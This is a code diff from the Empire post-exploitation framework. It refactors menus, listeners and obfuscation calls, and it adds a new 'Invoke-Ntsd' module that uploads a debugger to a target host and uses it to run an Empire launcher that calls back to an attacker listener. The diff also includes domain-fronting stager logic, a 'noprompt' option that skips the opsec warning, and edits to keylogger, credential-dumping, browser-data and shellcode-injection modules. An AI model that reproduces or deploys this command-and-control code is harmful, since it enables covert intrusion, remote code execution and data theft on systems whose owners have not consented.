self.stdout.write("%s\n" % str(self.ruler * len(header)))
for c in cmds:
self.stdout.write("%s %s\n" % (c.ljust(17), getattr(self, 'do_' + c).__doc__))
self.stdout.write("\n")
def emptyline(self):
pass
def default(self, line):
"Default handler"
print helpers.color("[!] Command not recognized, use 'help' to see available commands")
def do_back(self, line):
"Go back a menu."
return True
def do_agents(self, line):
"Jump to the Agents menu."
raise NavAgents()
def do_listeners(self, line):
"Jump to the listeners menu."
raise NavListeners()
def do_main(self, line):
"Go back to the main menu."
raise NavMain()
def do_help(self, *args):
"Displays the help menu or syntax for particular commands."
cmd.Cmd.do_help(self, *args)
SubMenu.do_help(self, *args)
def do_list(self, line):
@ -2703,6 +2699,7 @@ class PythonAgentMenu(cmd.Cmd):
# Strip asterisks added by MainMenu.complete_usemodule()
module = "python/%s" %(line.strip().rstrip("*"))
if module not in self.mainMenu.modules.modules:
print helpers.color("[!] Error: invalid module")
else:
@ -2834,14 +2831,12 @@ class PythonAgentMenu(cmd.Cmd):
# return helpers.complete_path(text,line)
class ListenersMenu(cmd.Cmd):
class ListenersMenu(SubMenu):
"""
The main class used by Empire to drive the 'listener' menu.
"""
def __init__(self, mainMenu):
cmd.Cmd.__init__(self)
self.mainMenu = mainMenu
SubMenu.__init__(self, mainMenu)
self.doc_header = 'Listener Commands'
@ -2851,45 +2846,10 @@ class ListenersMenu(cmd.Cmd):
# display all active listeners on menu startup
messages.display_active_listeners(self.mainMenu.listeners.activeListeners)
# def preloop(self):
# traceback.print_stack()
# print a nicely formatted help menu
# stolen/adapted from recon-ng
def print_topics(self, header, commands, cmdlen, maxcol):
if commands:
self.stdout.write("%s\n" % str(header))
if self.ruler:
self.stdout.write("%s\n" % str(self.ruler * len(header)))
for command in commands:
self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__))
self.stdout.write("\n")
def emptyline(self):
pass
def do_back(self, line):
"Go back to the main menu."
raise NavMain()
def do_agents(self, line):
"Jump to the Agents menu."
raise NavAgents()
def do_main(self, line):
"Go back to the main menu."
raise NavMain()
def do_exit(self, line):
"Exit Empire."
raise KeyboardInterrupt
def do_list(self, line):
"List all active listeners (or agents)."
@ -2966,7 +2926,7 @@ class ListenersMenu(cmd.Cmd):
def do_launcher(self, line):
"Generate an initial launcher for a listener."
parts = line.strip().split()
if len(parts) != 2:
print helpers.color("[!] Please enter 'launcher <language> <listenerName>'")
@ -3047,13 +3007,11 @@ class ListenersMenu(cmd.Cmd):
return [s[offs:] for s in names if s.startswith(mline)]
class ListenerMenu(cmd.Cmd):
class ListenerMenu(SubMenu):
def __init__(self, mainMenu, listenerName):
cmd.Cmd.__init__(self)
self.mainMenu = mainMenu
SubMenu.__init__(self, mainMenu)
if listenerName not in self.mainMenu.listeners.loadedListeners:
print helpers.color("[!] Listener '%s' not currently valid!" % (listenerName))
@ -3067,39 +3025,6 @@ class ListenerMenu(cmd.Cmd):
# set the text prompt
self.prompt = '(Empire: ' + helpers.color("listeners/%s" % (listenerName), 'red') + ') > '
def emptyline(self):
"""
If any empty line is entered, do nothing.
"""
pass
def do_back(self, line):
"Go back a menu."
return True
def do_agents(self, line):
"Jump to the Agents menu."
raise NavAgents()
def do_listeners(self, line):
"Jump to the listeners menu."
raise NavListeners()
def do_main(self, line):
"Go back to the main menu."
raise NavMain()
def do_exit(self, line):
"Exit Empire."
raise KeyboardInterrupt
def do_info(self, line):
"Display listener module options."
messages.display_listener_module(self.listener)
@ -3224,15 +3149,14 @@ class ListenerMenu(cmd.Cmd):
return [s[offs:] for s in languages if s.startswith(mline)]
class ModuleMenu(cmd.Cmd):
class ModuleMenu(SubMenu):
"""
The main class used by Empire to drive the 'module' menu.
"""
def __init__(self, mainMenu, moduleName, agent=None):
cmd.Cmd.__init__(self)
SubMenu.__init__(self, mainMenu)
self.doc_header = 'Module Commands'
self.mainMenu = mainMenu
try:
# get the current module/name
@ -3251,10 +3175,7 @@ class ModuleMenu(cmd.Cmd):
except Exception as e:
print helpers.color("[!] ModuleMenu() init error: %s" % (e))
# def preloop(self):
# traceback.print_stack()
def validate_options(self):
def validate_options(self, prompt):
"Ensure all required module options are completed."
# ensure all 'Required=True' options are filled in
@ -3288,8 +3209,9 @@ class ModuleMenu(cmd.Cmd):
print helpers.color("[!] Error: module needs to run in an elevated context.")
return False
# if the module isn't opsec safe, prompt before running
if ('OpsecSafe' in self.module.info) and (not self.module.info['OpsecSafe']):
# if the module isn't opsec safe, prompt before running (unless "execute noprompt" was issued)
if prompt and ('OpsecSafe' in self.module.info) and (not self.module.info['OpsecSafe']):
try:
choice = raw_input(helpers.color("[>] Module is not opsec safe, run? [y/N] ", "red"))
if not (choice.lower() != "" and choice.lower()[0] == "y"):
@ -3300,48 +3222,6 @@ class ModuleMenu(cmd.Cmd):
return True
def emptyline(self):
pass
# print a nicely formatted help menu
# stolen/adapted from recon-ng
def print_topics(self, header, commands, cmdlen, maxcol):
if commands:
self.stdout.write("%s\n" % str(header))
if self.ruler:
self.stdout.write("%s\n" % str(self.ruler * len(header)))
for command in commands:
self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__))
self.stdout.write("\n")
def do_back(self, line):
"Go back a menu."
return True
def do_agents(self, line):
"Jump to the Agents menu."
raise NavAgents()
def do_listeners(self, line):
"Jump to the listeners menu."
raise NavListeners()
def do_main(self, line):
"Go back to the main menu."
raise NavMain()
def do_exit(self, line):
"Exit Empire."
raise KeyboardInterrupt
def do_list(self, line):
"Lists all active agents (or listeners)."
@ -3352,7 +3232,6 @@ class ModuleMenu(cmd.Cmd):
else:
print helpers.color("[!] Please use 'list [agents/listeners] <modifier>'.")
def do_reload(self, line):
"Reload the current module."
@ -3444,7 +3323,11 @@ class ModuleMenu(cmd.Cmd):
def do_execute(self, line):
"Execute the given Empire module."
if not self.validate_options():
prompt = True
if line == "noprompt":
prompt = False
if not self.validate_options(prompt):
return
if self.moduleName.lower().startswith('external/'):
@ -3634,16 +3517,14 @@ class ModuleMenu(cmd.Cmd):
return [s[offs:] for s in names if s.startswith(mline)]
class StagerMenu(cmd.Cmd):
class StagerMenu(SubMenu):
"""
The main class used by Empire to drive the 'stager' menu.
"""
def __init__(self, mainMenu, stagerName, listener=None):
cmd.Cmd.__init__(self)
SubMenu.__init__(self, mainMenu)
self.doc_header = 'Stager Menu'
self.mainMenu = mainMenu
# get the current stager name
self.stagerName = stagerName
self.stager = self.mainMenu.stagers.stagers[stagerName]
@ -3657,7 +3538,6 @@ class StagerMenu(cmd.Cmd):
listener = self.mainMenu.listeners.get_listener(listener)
self.stager.options['Listener']['Value'] = listener
def validate_options(self):
"Make sure all required stager options are completed."
@ -3674,48 +3554,6 @@ class StagerMenu(cmd.Cmd):
return True
def emptyline(self):
pass
# print a nicely formatted help menu
# stolen/adapted from recon-ng
def print_topics(self, header, commands, cmdlen, maxcol):
if commands:
self.stdout.write("%s\n" % str(header))
if self.ruler:
self.stdout.write("%s\n" % str(self.ruler * len(header)))
for command in commands:
self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__))
self.stdout.write("\n")
def do_back(self, line):
"Go back a menu."
return True
def do_agents(self, line):
"Jump to the Agents menu."
raise NavAgents()
def do_listeners(self, line):
"Jump to the listeners menu."
raise NavListeners()
def do_main(self, line):
"Go back to the main menu."
raise NavMain()
def do_exit(self, line):
"Exit Empire."
raise KeyboardInterrupt
def do_list(self, line):
"Lists all active agents (or listeners)."
@ -3783,7 +3621,6 @@ class StagerMenu(cmd.Cmd):
def do_generate(self, line):
"Generate/execute the given Empire stager."
if not self.validate_options():
return
@ -3814,7 +3651,6 @@ class StagerMenu(cmd.Cmd):
os.chmod(savePath, 777)
print "\n" + helpers.color("[*] Stager output written out to: %s\n" % (savePath))
else:
print stagerOutput

2
lib/common/listeners.py
View File

@ -4,7 +4,7 @@
Listener handling functionality for Empire.
"""
import sys
import fnmatch
import imp
import helpers

9
lib/common/packets.py
View File

@ -200,14 +200,7 @@ def parse_result_packet(packet, offset=0):
taskID = struct.unpack('=H', packet[6+offset:8+offset])[0]
length = struct.unpack('=L', packet[8+offset:12+offset])[0]
if length != '0':
if length % 4:
#padding fix
datapart = packet[12+offset:12+offset+length]
datapart += '=' * (4 - length % 4)
data = base64.b64decode(datapart)
else:
data = base64.b64decode(packet[12+offset:12+offset+length])
#data = base64.b64decode(packet[12+offset:12+offset+length])
data = base64.b64decode(packet[12+offset:12+offset+length])
else:
data = None
remainingData = packet[12+offset+length:]

11
lib/common/stagers.py
View File

@ -18,6 +18,7 @@ import fnmatch
import imp
import helpers
import os
import errno
import macholib.MachO
import shutil
import zipfile
@ -443,6 +444,15 @@ class Stagers:
javacode = file.read()
file.close()
javacode = javacode.replace("LAUNCHER",launcherCode)
jarpath = self.mainMenu.installPath+'data/misc/classes/com/installer/apple/'
try:
os.makedirs(jarpath)
except OSError as e:
if e.errno != errno.EEXIST:
raise
else:
pass
file = open(self.mainMenu.installPath+'data/misc/classes/com/installer/apple/Run.java','w')
file.write(javacode)
file.close()
@ -460,6 +470,7 @@ class Stagers:
return jar
def generate_upload(self, file, path):
script = """
$b64 = "BASE64_BLOB_GOES_HERE"

10
lib/listeners/dbx.py
View File

@ -111,6 +111,16 @@ class Listener:
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'SlackToken' : {
'Description' : 'Your SlackBot API token to communicate with your Slack instance.',
'Required' : False,
'Value' : ''
},
'SlackChannel' : {
'Description' : 'The Slack channel or DM that notifications will be sent to.',
'Required' : False,
'Value' : '#general'
}
}

39
lib/listeners/http.py
View File

@ -1,5 +1,6 @@
import logging
import base64
import sys
import random
import os
import ssl
@ -107,7 +108,7 @@ class Listener:
'Value' : 'Microsoft-IIS/7.5'
},
'StagerURI' : {
'Description' : 'URI for the stager. Example: stager.php',
'Description' : 'URI for the stager. Must use /download/. Example: /download/stager.php',
'Required' : False,
'Value' : ''
},
@ -295,10 +296,11 @@ class Listener:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization("try{$ig=$WC.DownloadData($ser)}catch{};")
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization("try{$ig=$WC.DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
@ -494,7 +496,7 @@ class Listener:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(randomizedStager, obfuscationCommand=obfuscationCommand)
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
@ -585,7 +587,7 @@ class Listener:
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(code, obfuscationCommand=obfuscationCommand)
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
@ -708,6 +710,10 @@ class Listener:
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
@ -758,6 +764,10 @@ def send_message(packets=None):
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an erro (like 404)
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
return (HTTPError.code, '')
except urllib2.URLError as URLerror:
@ -884,7 +894,7 @@ def send_message(packets=None):
if 'not in cache' in results:
# signal the client to restage
print helpers.color("[*] Orphaned agent from %s, signaling retaging" % (clientIP))
print helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
@ -963,7 +973,18 @@ def send_message(packets=None):
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
pyversion = sys.version_info
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:

21
lib/listeners/http_com.py
View File

@ -5,6 +5,7 @@ import os
import ssl
import time
import copy
import sys
from pydispatch import dispatcher
from flask import Flask, request, make_response
@ -313,7 +314,7 @@ class Listener:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(randomizedStager, self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
@ -369,7 +370,7 @@ class Listener:
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(code, self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
else:
@ -460,6 +461,10 @@ class Listener:
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
@ -630,7 +635,17 @@ class Listener:
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:

8
lib/listeners/http_foreign.py
View File

@ -451,6 +451,10 @@ class Listener:
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
@ -498,7 +502,9 @@ def send_message(packets=None):
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an erro (like 404)
missedCheckins = missedCheckins + 1
return (HTTPError.code, '')
r#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
except urllib2.URLError as URLerror:
# if the server cannot be reached

8
lib/listeners/http_hop.py
View File

@ -419,6 +419,10 @@ class Listener:
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
@ -466,7 +470,9 @@ def send_message(packets=None):
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an erro (like 404)
missedCheckins = missedCheckins + 1
return (HTTPError.code, '')
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
except urllib2.URLError as URLerror:
# if the server cannot be reached

13
lib/listeners/http_mapi.py
View File

@ -5,6 +5,7 @@ import os
import ssl
import time
import copy
import sys
from pydispatch import dispatcher
from flask import Flask, request, make_response
@ -616,7 +617,17 @@ class Listener:
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:

2
lib/modules/powershell/code_execution/invoke_dllinjection.py
View File

@ -88,6 +88,6 @@ class Module:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/code_execution/invoke_metasploitpayload.py
View File

@ -72,6 +72,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

165
lib/modules/powershell/code_execution/invoke_ntsd.py Normal file
View File

@ -0,0 +1,165 @@
from lib.common import helpers
import base64
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Ntsd',
'Author': ['james fitts'],
'Description': ("Use NT Symbolic Debugger to execute Empire launcher code"),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : False,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [""]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'UploadPath' : {
'Description' : 'Path to drop dll (C:\Users\Administrator\Desktop).',
'Required' : False,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'BinPath' : {
'Description' : 'Binary to set NTSD to debug.',
'Required' : True,
'Value' : "C:\\Windows\\System32\\calc.exe"
},
'Arch' : {
'Description' : 'Architecture the system is on.',
'Required' : True,
'Value' : 'x64'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
uploadPath = self.options['UploadPath']['Value'].strip()
bin = self.options['BinPath']['Value']
arch = self.options['Arch']['Value']
ntsd_exe_upload_path = uploadPath + "\\" + "ntsd.exe"
ntsd_dll_upload_path = uploadPath + "\\" + "ntsdexts.dll"
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
if arch == 'x64':
ntsd_exe = self.mainMenu.installPath + "data/module_source/code_execution/ntsd_x64.exe"
ntsd_dll = self.mainMenu.installPath + "data/module_source/code_execution/ntsdexts_x64.dll"
elif arch == 'x86':
ntsd_exe = self.mainMenu.installPath + "data/module_source/code_execution/ntsd_x86.exe"
ntsd_dll = self.mainMenu.installPath + "data/module_source/code_execution/ntsdexts_x86.dll"
# read in the common module source code
moduleSource = self.mainMenu.installPath + "data/module_source/code_execution/Invoke-Ntsd.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = ""
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: %s" %(listenerName))
return ''
else:
l = self.mainMenu.stagers.stagers['multi/launcher']
l.options['Listener']['Value'] = self.options['Listener']['Value']
l.options['UserAgent']['Value'] = self.options['UserAgent']['Value']
l.options['Proxy']['Value'] = self.options['Proxy']['Value']
l.options['ProxyCreds']['Value'] = self.options['ProxyCreds']['Value']
launcher = l.generate()
if launcher == '':
print helpers.color('[!] Error in launcher generation.')
return ''
else:
launcherCode = launcher.split(' ')[-1]
with open(ntsd_exe, 'rb') as bin_data:
ntsd_exe_data = bin_data.read()
with open(ntsd_dll, 'rb') as bin_data:
ntsd_dll_data = bin_data.read()
exec_write = "Write-Ini %s \"%s\"" % (uploadPath, launcher)
code_exec = "%s\\ntsd.exe -cf %s\\ntsd.ini %s" % (uploadPath, uploadPath, bin)
ntsd_exe_upload = self.mainMenu.stagers.generate_upload(ntsd_exe_data, ntsd_exe_upload_path)
ntsd_dll_upload = self.mainMenu.stagers.generate_upload(ntsd_dll_data, ntsd_dll_upload_path)
script += "\r\n"
script += ntsd_exe_upload
script += ntsd_dll_upload
script += "\r\n"
script += exec_write
script += "\r\n"
# this is to make sure everything was uploaded properly
script += "Start-Sleep -s 5"
script += "\r\n"
script += code_exec
return script

2
lib/modules/powershell/code_execution/invoke_reflectivepeinjection.py
View File

@ -127,6 +127,6 @@ class Module:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/code_execution/invoke_shellcode.py
View File

@ -145,6 +145,6 @@ class Module:
scriptEnd += "; 'Shellcode injected.'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/code_execution/invoke_shellcodemsil.py
View File

@ -89,6 +89,6 @@ class Module:
sc = ",0".join(values['Value'].split("\\"))[1:]
scriptEnd += " -" + str(option) + " @(" + sc + ")"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/collection/ChromeDump.py
View File

@ -103,6 +103,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/collection/FoxDump.py
View File

@ -107,6 +107,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/collection/USBKeylogger.py
View File

@ -79,6 +79,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/collection/WebcamRecorder.py
View File

@ -216,5 +216,5 @@ Start-WebcamRecorder"""
else:
script += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script

2
lib/modules/powershell/collection/browser_data.py
View File

@ -103,6 +103,6 @@ class Module:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/collection/clipboard_monitor.py
View File

@ -89,6 +89,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/collection/file_finder.py
View File

@ -162,5 +162,5 @@ class Module:
script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script

2
lib/modules/powershell/collection/find_interesting_file.py
View File

@ -127,5 +127,5 @@ class Module:
script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script

2
lib/modules/powershell/collection/get_indexed_item.py
View File

@ -88,6 +88,6 @@ class Module:
scriptEnd += " | ?{!($_.ITEMURL -like '*AppData*')} | Select-Object ITEMURL, COMPUTERNAME, FILEOWNER, SIZE, DATECREATED, DATEACCESSED, DATEMODIFIED, AUTOSUMMARY"
scriptEnd += " | fl | Out-String;"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/collection/get_sql_column_sample_data.py
View File

@ -114,6 +114,6 @@ class Module:
if no_defaults:
scriptEnd += " -NoDefaults "
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/collection/get_sql_query.py
View File

@ -89,6 +89,6 @@ class Module:
scriptEnd += " -Instance "+instance
scriptEnd += " -Query "+"\'"+query+"\'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/collection/inveigh.py
View File

@ -232,6 +232,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\""
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/collection/keylogger.py
View File

@ -77,6 +77,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/collection/minidump.py
View File

@ -98,6 +98,6 @@ class Module:
if option != "Agent" and option != "ProcessName" and option != "ProcessId":
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/collection/netripper.py
View File

@ -117,6 +117,6 @@ class Module:
scriptEnd += ";'Invoke-NetRipper completed.'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

2
lib/modules/powershell/collection/ninjacopy.py
View File

@ -103,6 +103,6 @@ class Module:
scriptEnd += "; Write-Output 'Invoke-NinjaCopy Completed'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
